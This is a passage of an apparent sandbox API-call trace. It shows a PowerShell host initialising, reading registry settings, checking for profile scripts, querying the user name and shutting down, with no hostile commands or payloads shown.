	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.533] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.534] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.534] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.534] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.535] GetLastError () returned 0xcb
	[0063.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.538] GetLastError () returned 0xcb
	[0063.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.538] GetLastError () returned 0xcb
	[0063.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.538] GetLastError () returned 0xcb
	[0063.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.538] GetLastError () returned 0xcb
	[0063.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.538] GetLastError () returned 0xcb
	[0063.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.556] GetLastError () returned 0xcb
	[0063.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.556] GetLastError () returned 0xcb
	[0063.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.556] GetLastError () returned 0xcb
	[0063.556] VirtualQuery (in: lpAddress=0xad288, lpBuffer=0xae288, dwLength=0x1c | out: lpBuffer=0xae288*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.557] GetLastError () returned 0xcb
	[0063.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.557] GetLastError () returned 0xcb
	[0063.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.557] GetLastError () returned 0xcb
	[0063.557] VirtualQuery (in: lpAddress=0xad280, lpBuffer=0xae280, dwLength=0x1c | out: lpBuffer=0xae280*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.558] VirtualQuery (in: lpAddress=0xacf34, lpBuffer=0xadf34, dwLength=0x1c | out: lpBuffer=0xadf34*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.558] VirtualQuery (in: lpAddress=0xacf34, lpBuffer=0xadf34, dwLength=0x1c | out: lpBuffer=0xadf34*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.559] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x380) returned 0x0
	[0063.559] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaea04, lpData=0x0, lpcbData=0xaea00*=0x0 | out: lpType=0xaea04*=0x1, lpData=0x0, lpcbData=0xaea00*=0x56) returned 0x0
	[0063.559] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaea04, lpData=0x242ad0, lpcbData=0xaea00*=0x56 | out: lpType=0xaea04*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xaea00*=0x56) returned 0x0
	[0063.559] RegCloseKey (hKey=0x380) returned 0x0
	[0063.560] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x380) returned 0x0
	[0063.560] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaea04, lpData=0x0, lpcbData=0xaea00*=0x0 | out: lpType=0xaea04*=0x1, lpData=0x0, lpcbData=0xaea00*=0x56) returned 0x0
	[0063.560] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaea04, lpData=0x242ad0, lpcbData=0xaea00*=0x56 | out: lpType=0xaea04*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xaea00*=0x56) returned 0x0
	[0063.560] RegCloseKey (hKey=0x380) returned 0x0
	[0063.561] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x242ad0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\Documents") returned 0x0
	[0063.561] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents", nBufferLength=0x105, lpBuffer=0xae554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents", lpFilePart=0x0) returned 0x1f
	[0063.561] GetLastError () returned 0x3f0
	[0063.561] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x242ad0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\Documents") returned 0x0
	[0063.561] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents", nBufferLength=0x105, lpBuffer=0xae554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents", lpFilePart=0x0) returned 0x1f
	[0063.561] GetLastError () returned 0x3f0
	[0063.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xae5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0063.562] GetLastError () returned 0x3f0
	[0063.562] SetErrorMode (uMode=0x1) returned 0x1
	[0063.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xaea6c | out: lpFileInformation=0xaea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0063.562] GetLastError () returned 0x2
	[0063.562] SetErrorMode (uMode=0x1) returned 0x1
	[0063.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xae5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0063.562] GetLastError () returned 0x2
	[0063.562] SetErrorMode (uMode=0x1) returned 0x1
	[0063.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xaea6c | out: lpFileInformation=0xaea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0063.562] GetLastError () returned 0x2
	[0063.562] SetErrorMode (uMode=0x1) returned 0x1
	[0063.563] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xae5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x3d
	[0063.563] GetLastError () returned 0x2
	[0063.563] SetErrorMode (uMode=0x1) returned 0x1
	[0063.563] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\2xc7u663gxwc\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xaea6c | out: lpFileInformation=0xaea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0063.563] GetLastError () returned 0x3
	[0063.563] SetErrorMode (uMode=0x1) returned 0x1
	[0063.563] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xae5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x52
	[0063.563] GetLastError () returned 0x3
	[0063.563] SetErrorMode (uMode=0x1) returned 0x1
	[0063.563] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\2xc7u663gxwc\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xaea6c | out: lpFileInformation=0xaea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0063.563] GetLastError () returned 0x3
	[0063.563] SetErrorMode (uMode=0x1) returned 0x1
	[0063.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.564] GetLastError () returned 0xcb
	[0063.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.565] GetLastError () returned 0xcb
	[0063.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.565] GetLastError () returned 0xcb
	[0063.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.565] GetLastError () returned 0xcb
	[0063.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.565] GetLastError () returned 0xcb
	[0063.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.566] GetLastError () returned 0xcb
	[0063.566] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380
	[0063.566] GetLastError () returned 0x0
	[0063.566] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x384
	[0063.566] GetLastError () returned 0x0
	[0063.566] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0063.566] GetLastError () returned 0x0
	[0063.566] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c
	[0063.566] GetLastError () returned 0x0
	[0063.566] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390
	[0063.566] GetLastError () returned 0x0
	[0063.566] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x394
	[0063.566] GetLastError () returned 0x0
	[0063.566] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4
	[0063.566] GetLastError () returned 0x0
	[0063.566] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
	[0063.567] GetLastError () returned 0x0
	[0063.567] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c
	[0063.567] GetLastError () returned 0x0
	[0063.567] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a0
	[0063.567] GetLastError () returned 0x0
	[0063.567] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0063.567] GetLastError () returned 0x0
	[0063.567] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0063.567] GetLastError () returned 0x0
	[0063.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.567] GetLastError () returned 0xcb
	[0063.568] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0063.568] GetLastError () returned 0xcb
	[0063.568] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xaeaac | out: lpMode=0xaeaac) returned 1
	[0063.569] GetLastError () returned 0xcb
	[0063.569] SetEvent (hEvent=0x38c) returned 1
	[0063.569] GetLastError () returned 0xcb
	[0063.569] SetEvent (hEvent=0x380) returned 1
	[0063.569] GetLastError () returned 0xcb
	[0063.569] SetEvent (hEvent=0x384) returned 1
	[0063.569] GetLastError () returned 0xcb
	[0063.569] SetEvent (hEvent=0x388) returned 1
	[0063.569] GetLastError () returned 0xcb
	[0063.569] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4
	[0063.569] GetLastError () returned 0x0
	[0063.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.570] GetLastError () returned 0xcb
	[0063.570] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xae910 | out: phkResult=0xae910*=0x320) returned 0x0
	[0063.570] RegQueryValueExW (in: hKey=0x320, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xae958, lpData=0x0, lpcbData=0xae954*=0x0 | out: lpType=0xae958*=0x0, lpData=0x0, lpcbData=0xae954*=0x0) returned 0x2
	[0064.779] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x360
	[0064.779] GetLastError () returned 0x0
	[0064.779] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x364
	[0064.779] GetLastError () returned 0x0
	[0064.779] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368
	[0064.779] GetLastError () returned 0x0
	[0064.779] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0064.780] GetLastError () returned 0x0
	[0064.780] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x370
	[0064.780] GetLastError () returned 0x0
	[0064.780] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x374
	[0064.780] GetLastError () returned 0x0
	[0064.780] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac
	[0064.780] GetLastError () returned 0x0
	[0064.780] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398
	[0064.780] GetLastError () returned 0x0
	[0064.780] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3bc
	[0064.780] GetLastError () returned 0x0
	[0064.780] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c0
	[0064.780] GetLastError () returned 0x0
	[0064.780] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4
	[0064.780] GetLastError () returned 0x0
	[0064.780] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8
	[0064.780] GetLastError () returned 0x0
	[0064.780] SetEvent (hEvent=0x36c) returned 1
	[0064.780] GetLastError () returned 0x0
	[0064.781] SetEvent (hEvent=0x360) returned 1
	[0064.781] GetLastError () returned 0x0
	[0064.781] SetEvent (hEvent=0x364) returned 1
	[0064.781] GetLastError () returned 0x0
	[0064.781] SetEvent (hEvent=0x368) returned 1
	[0064.781] GetLastError () returned 0x0
	[0064.781] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc
	[0064.781] GetLastError () returned 0x0
	[0064.781] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xae944 | out: phkResult=0xae944*=0x3d0) returned 0x0
	[0064.781] RegQueryValueExW (in: hKey=0x3d0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xae98c, lpData=0x0, lpcbData=0xae988*=0x0 | out: lpType=0xae98c*=0x0, lpData=0x0, lpcbData=0xae988*=0x0) returned 0x2
	[0064.866] SetEvent (hEvent=0x370) returned 1
	[0064.866] GetLastError () returned 0x0
	[0064.866] SetEvent (hEvent=0x374) returned 1
	[0064.866] GetLastError () returned 0x0
	[0064.866] SetEvent (hEvent=0x3ac) returned 1
	[0064.866] GetLastError () returned 0x0
	[0064.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.877] GetLastError () returned 0xcb
	[0064.880] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xaea20 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xaea20) returned 0x1
	[0064.881] GetLastError () returned 0xcb
	[0064.881] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xaea28 | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xaea28) returned 1
	[0064.882] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x254fe3c*="Stopped", lpRawData=0x254fcf8) returned 1
	[0064.882] GetLastError () returned 0x0
	[0064.882] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
	[0064.882] GetLastError () returned 0x0
	[0064.884] CoGetContextToken (in: pToken=0xaf758 | out: pToken=0xaf758) returned 0x0
	[0064.884] CObjectContext::QueryInterface () returned 0x0
	[0064.884] CObjectContext::GetCurrentThreadType () returned 0x0
	[0064.884] Release () returned 0x0
	[0064.886] CoGetContextToken (in: pToken=0xaf530 | out: pToken=0xaf530) returned 0x0
	[0064.886] CObjectContext::QueryInterface () returned 0x0
	[0064.886] CObjectContext::GetCurrentThreadType () returned 0x0
	[0064.886] Release () returned 0x0
	[0064.889] CoGetContextToken (in: pToken=0xaf530 | out: pToken=0xaf530) returned 0x0
	[0064.889] CObjectContext::QueryInterface () returned 0x0
	[0064.889] CObjectContext::GetCurrentThreadType () returned 0x0
	[0064.889] Release () returned 0x0
	[0064.899] CoGetContextToken (in: pToken=0xaf530 | out: pToken=0xaf530) returned 0x0
	[0064.899] CObjectContext::QueryInterface () returned 0x0
	[0064.899] CObjectContext::GetCurrentThreadType () returned 0x0
	[0064.899] Release () returned 0x0
	[0064.931] CoGetContextToken (in: pToken=0xaf510 | out: pToken=0xaf510) returned 0x0
	[0064.931] CObjectContext::QueryInterface () returned 0x0
	[0064.931] CObjectContext::GetCurrentThreadType () returned 0x0
	[0064.931] Release () returned 0x0
	[0064.932] CoUninitialize () 

Thread:
	id = 62
	os_tid = 0x8cc


Thread:
	id = 63
	os_tid = 0x8fc


Thread:
	id = 65
	os_tid = 0x240


Thread:
	id = 66
	os_tid = 0x908


Thread:
	id = 67
	os_tid = 0x23c

	[0057.827] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0062.152] LocalFree (hMem=0x263ff8) returned 0x0
	[0062.152] GetLastError () returned 0x0
	[0062.152] CloseHandle (hObject=0x320) returned 1
	[0062.152] GetLastError () returned 0x0
	[0062.152] CloseHandle (hObject=0x13) returned 1
	[0062.152] GetLastError () returned 0x0
	[0062.153] CloseHandle (hObject=0xf) returned 1
